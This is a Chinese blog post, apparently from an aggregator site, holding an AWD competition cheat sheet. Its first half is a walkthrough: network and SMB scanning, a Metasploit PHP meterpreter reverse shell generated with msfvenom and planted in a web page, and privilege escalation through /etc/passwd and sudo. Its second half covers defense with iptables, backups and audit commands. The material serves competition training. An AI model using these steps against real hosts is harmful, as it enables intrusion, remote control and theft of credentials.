AWD

Posted lyxf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了AWD相关的知识,希望对你有一定的参考价值。

扫描对方IP:
ifconfig (先获取自己的IP)
netdiscover -r 192.168.0.1/24   (扫描1~124的IP)

获取IP后:
nmap -sV 192.168.0.104 (端口扫描)
nmap -A -v -T4 192.168.0.104 (TCP 端口扫描)

端口:
    22: ssh
    21: ftp
    23: telnet
    80: http
    433:https
    3306: mysql
若有Samba服务开起:
smbclinet -L 192.168.0.104 (查看目录)

smbclinet ‘\192.168.0.104print$‘ (进入目录print$)
(一个一个的试)(弱密码猜测)
若进入后:
get a.txt  (可以获取a.txt文件)

mysql -h 192.168.0.104 -u Admin  -p (连接数据库)
(输入密码)  (密码可能藏在某个文件)

searchsploit Samba smbd 3.x - 4.x (搜索)

dirb http://192.168.0.104 (扫描web)

进入网站
登录Admin
使用msf来设置payload
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options (查看)
set lhost (ip)
set lport (ip)
run (监听)

msfvenom -p php/meterpreter/reverse_tcp lhost=(ip) lport=(ip) -f raw
(生成php shell 木马)

将木马复制粘贴到某一个php页面,然后想方设法触发漏洞,通过访问该php,即可触发漏洞

触发成功后:
msf里shell

提权:
id (查看当前的用户uid)
python -c "import pty;pty.spawn(‘/bin/bash‘)"
cat /etc/passwd (获取用户)
su (用户) (有密码自己找)
sudo -l 提权
sudo su
进入查找flag,一般在 /root/proot.txt
cat proot.txt
提交flag!


ssh操作

ssh <-p 端口> 用户名@IP  //登录
scp 文件路径  用户名@IP:存放路径  //向ssh服务器上传输文件

备份web目录
  tar -zcvf web.tar.gz /var/www/html/
用户管理
  w   //查看当前用户
  pkill -kill -t <用户tty>   //踢掉当前登录用户

进程管理

  ps aux | grep pid或者进程名  //查看进程信息

  查看已建立的网络连接及进程
  netstat -antulp | grep EST

  查看指定端口被哪个进程占用
  lsof -i:端口号 或者 netstat -tunlp|grep 端口号

  结束进程命令
  kill PID
  killall <进程名>
  kill -9 <PID>

iptables命令

  封杀某个IP或者ip段,如:123.4.5.6
  iptables -I INPUT -s 123.4.5.6 -j DROP
  iptables -I INPUT -s 123.4.5.1/24 -j DROP

  禁止从某个主机ssh远程访问登陆到本机,如123.4.5.6
  iptable -t filter -A INPUT -s 123.4.5.6 -p tcp --dport 22 -j DROP

Mysql数据库操作

  备份mysql数据库
  mysqldump -u 用户名 -p 密码 数据库名 > back.sql  //备份指定数据库
  mysqldump --all-databases > bak.sql    //备份所有数据库

  还原mysql数据库
  mysql -u 用户名 -p 密码 数据库名 < bak.sql

安全检查

  find / *.php -perm 4777    //查找777的权限的php文件
  awk -F: ‘{if($3==0)print $1}‘ /etc/passwd  //查看root权限的账号
  crontab -l  //查看计划任务

  检测所有的tcp连接数量及状态
  netstat -ant|awk ‘{print $5 " " $6}‘ |grep "[1-9][0-9]*."|sed -e ‘s/::ffff://‘ -e ‘s/:[0-9]*//‘|sort|uniq -c|sort -rn

  查看页面访问排名前十的IP
  cat /var/log/apache2/access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10

  查看页面访问排名前十的URL
  cat /var/log/apache2/access.log | cut -f4 -d " " | sort | uniq -c | sort -k 1 -r | head -10  



    搜寻网站简要信息
  curl --head 网站
  xprobe2 -v 网站
  nmap []
  -A显示详细版本信息
  -v显示详细信息
  -o显示对方操作系统

  matego

  Web漏洞发现(http扫描)
 webshag
  w3af---(强大专业工具)
  owasp ZAP等同于w3af WEB扫描工具

  注入工具
  Sqlmap
  setoolkit(*****很牛工具)

 


以上是关于AWD的主要内容,如果未能解决你的问题,请参考以下文章

网站目录监控脚本,shell,awd用

网站目录监控脚本,shell,awd用

从一次AWD学习patch

CTF 线下AWD 一些py脚本

AWD平台搭建--Cardinal

AWD